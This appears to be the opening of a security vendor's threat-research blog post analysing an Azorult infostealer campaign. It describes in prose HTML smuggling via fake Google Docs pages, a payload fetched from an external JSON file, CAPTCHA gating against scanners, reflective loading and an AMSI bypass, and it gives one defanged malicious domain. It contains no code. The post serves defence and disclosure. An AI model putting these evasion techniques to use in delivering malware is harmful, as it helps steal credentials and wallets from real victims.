Summary
Netskope Threat Labs has observed an evasive Azorult campaign in the wild that employs multiple defense evasion techniques from delivery through execution to fly under the defender’s radar as it steals sensitive data.
Azorult is an information stealer first discovered in 2016 that steals sensitive information including user credentials, browser information, and crypto wallet data. Azorult is on the rise and is currently one of the top malware families that Netskope Threat Labs has observed targeting the healthcare industry over the last year.
In this blog post, Netskope Threat Labs performs a detailed teardown of an evasive AzoruIt malware campaign we observed in the wild. This campaign is noteworthy for the following reasons:
- It delivers its initial payload through HTML smuggling, a detection evasion technique that is gaining popularity among adversaries. This defense evasion technique was also used by a nation-state group to smuggle a remote access trojan, and by Nokoyawa ransomware, where they started the infection process through HTML smuggling.
- It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website.
- It executes the fileless Azorult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts.
- It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.
- It steals sensitive data, including information for 137 distinct crypto wallets, login credentials, browser files, and important documents.
Google Sites serves as a decoy for HTML smuggling
HTML smuggling is a defense evasion technique that aims to bypass web controls that block risky file types. It abuses legitimate HTML5 download attributes and Javascript blobs to construct malicious payloads on the client side, bypassing network security filters.
As part of Netskope Threat Labs’ threat hunting activities, we uncovered a campaign wherein an attacker created fake Google Docs pages on Google Sites from which they used HTML smuggling to download malicious payloads. They lure their victims to the fake Google Docs pages to trick them into believing the downloaded file was from Google Docs. In most cases that we see in the wild, the adversary embeds the smuggled malicious payload in the Javascript itself. In this example, the adversary embedded the malicious payload in a separate JSON file as a BASE64 encoded string. When the victim accesses the website, it sends a GET request to download the JSON file from a separate domain (mahmudiyeresort[.]com[.]tr
) and extracts the payload from there.
Smuggling With A Captcha
Usually, when a victim accesses a website that uses HTML smuggling to deliver malicious payloads, the payload is downloaded immediately. For this campaign, the attacker’s website hosted on Google Sites initiates a CAPTCHA, which serves as an additional layer of protection against URL scanners. This helps the HTML file to remain undetected in public scanners like Virustotal, which cannot proceed past the CAPTCHA.